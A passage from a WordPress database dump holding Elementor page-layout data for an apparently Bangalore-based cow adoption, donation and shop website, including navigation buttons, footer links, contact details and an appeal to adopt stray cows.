fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"c6d2d93\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c0c7458\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"2eb3085\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41d39d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1ec00ae\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"58263a0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1fe19cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a8042dd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"41de25e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e80cac0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ab4d180\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6e6c805\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11835,1963,'_elementor_page_assets','a:0:{}'),(11837,1964,'_elementor_edit_mode','builder'),(11838,1964,'_elementor_template_type','wp-page'),(11839,1964,'_elementor_version','3.7.8'),(11840,1964,'_wp_page_template','elementor_canvas'),(11841,1964,'_elementor_data','[{\"id\":\"442ae7f\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"27b1818\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"b4f0fda\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"69a6cbf\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"79e4ef4\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2424986\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8aaabba\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"72051db\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26e5a5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"c20d2f2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"9230eae\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"f509e14\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f468db2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"2250764\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c479969\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ad82ec2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"61e999c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=1 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87f91ce\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"9860375\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c30f35b\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"c6d2d93\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c0c7458\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"2eb3085\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41d39d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1ec00ae\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"58263a0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1fe19cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a8042dd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"41de25e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e80cac0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ab4d180\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6e6c805\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11842,1964,'_elementor_page_assets','a:0:{}'),(11844,1965,'_elementor_edit_mode','builder'),(11845,1965,'_elementor_template_type','wp-page'),(11846,1965,'_elementor_version','3.7.8'),(11847,1965,'_wp_page_template','elementor_canvas'),(11848,1965,'_elementor_data','[{\"id\":\"442ae7f\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"27b1818\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"b4f0fda\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"69a6cbf\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"79e4ef4\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2424986\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8aaabba\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"72051db\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26e5a5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"c20d2f2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"9230eae\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"f509e14\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f468db2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"2250764\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c479969\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ad82ec2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"61e999c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=1 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87f91ce\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"9860375\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c30f35b\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"c6d2d93\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c0c7458\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"2eb3085\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41d39d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing 